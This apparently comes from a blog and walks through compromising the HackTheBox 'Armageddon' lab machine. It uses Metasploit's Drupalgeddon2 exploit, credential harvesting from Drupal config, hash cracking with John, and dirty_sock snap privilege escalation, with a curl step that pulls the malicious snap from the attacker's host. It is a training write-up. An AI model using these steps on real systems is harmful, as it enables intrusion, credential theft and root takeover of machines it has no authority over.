HackTheBox: Armageddon Machine Walkthrough – Easy Machine

Written by darknite -
on April 4, 2021

In this post, i would like to share a walkthrough on Armageddon Machine.

This room has been considered difficulty rated as an Easy machine

Testing

Information Gathering on Armageddon

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Let’s open the browser and straight into the website interface.

Nothing that we can use on the website interface.

Gaining Access on Armageddon

There’s nothing malicious code implemented on the website. Let’s do some research on Drupal 7 which was mentioned in Nmap result. Most of the result leads to using Metasploit

Let’s run Metasploit on our attacker’s machine and search for any available exploit for Drupal 7 on Metasploit.

Let’s use exploit no 4 which is exploit/unix/webapp/drupa_drupalgeddon2

We need to know what kind of information to key-in on the exploit itself.

After a while, i notice that we only need to put in RHOSTS (Armageddon’s machine IP) and LHOST which our VPN IP

Once that have been completed, we need to exploit it by executing a command either run or exploit

We can open a shell and need to key-in the bash -i command to get a bash interface

We need to look at what has been stored here and i notice there’s a sites directory that looks suspicious

Let’s jump into the sites directory by typing cd sites

There’s a directory called default and let’s jump into that directory

Inside the default directory, there has a bunch of files that we investigate it.

It’s extremely hard to see everything on this file. Let’s use some wildcards to get the credentials that we needed.

After we use those wildcards, we found the username and password that can use later.

I notice on the source code that the system is using mysql service. Let’s use the credentials that we found in mysql service which the command can run such as mysql -u drupaluser -h localhost -p (password is the same that we found before.

We did find the username and password on the database, but the password is encrypted with hashes

Maintaining Access to Armageddon

Let’s crack the hashes using john the ripper with the command john <filename> -w=/usr/share/wordlists/rockyou.txt

During our nmap scanning, we notice that ssh service is open. Let’s ssh into the machine with the command ssh brucetherealadmin@<ip address> and we can use the password that we found using john over here.

We managed to login to the machine and i found the user flag.

Let’s grab the user flag by using cat user.txt

Escalate to Root Privileges Access

For us to have privileged access to root, we need to know any SUID that we can use if we notice the machine is vulnerable to snap exploit

Let’s do another research and found the dirty sock exploit can be used over here.

Exploiting a dirty sock on the machine

You need to download the dirty_sockv2.py into our machine

From the script, we just need to use Trojan_snap section with some extra commands from python and base64

As you can see above, we cannot execute it on the victim’s machine which we conclude only use on the attacker’s machine

For the exploit to be working well, we will execute on root privileges access

Next, the file will need to be transferred to the victim’s machine, so we need to start the python server

As usual, we need to transfer it using wget command but sadly that the victim’s machine doesn’t have that command installed

We can still use curl for that purpose and the command for that is curl http://<ip address>:<port>/<filename>.snap -o <any_name>.snap

We can verify that the file has been fully downloaded here.

Let’s install the dirty-sock 0.1 by running sudo /usr/bin/snap install –devmode <any_name>.snap

Once dirty sock has. installed, you can switch to dirty_sock privileges access by executing the command su dirty_sock

During my first time overrunning the command above, the machine gives an error saying that the user doesn’t exist. Those stuck here, can reset the machine, and re-try again the above command

We can clarify which privileges access we are using over here by running whoami command

To escalate to root privileges access, you need to execute sudo -i command with the password dirty-sock

Now, we logged in as the root users.

As usual, we need to access the /root/ directory and we need to type cat root.txt to grab the user flag

-THE END-

Happy Learning Guys!

Categories:

Easy Machine

Tags:

Challengescurldirty sockDrupalHackTheBoxjohn the ripperLinuxmetasploitMySQLmysql databasePenetration Testingpython serversnapssh

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *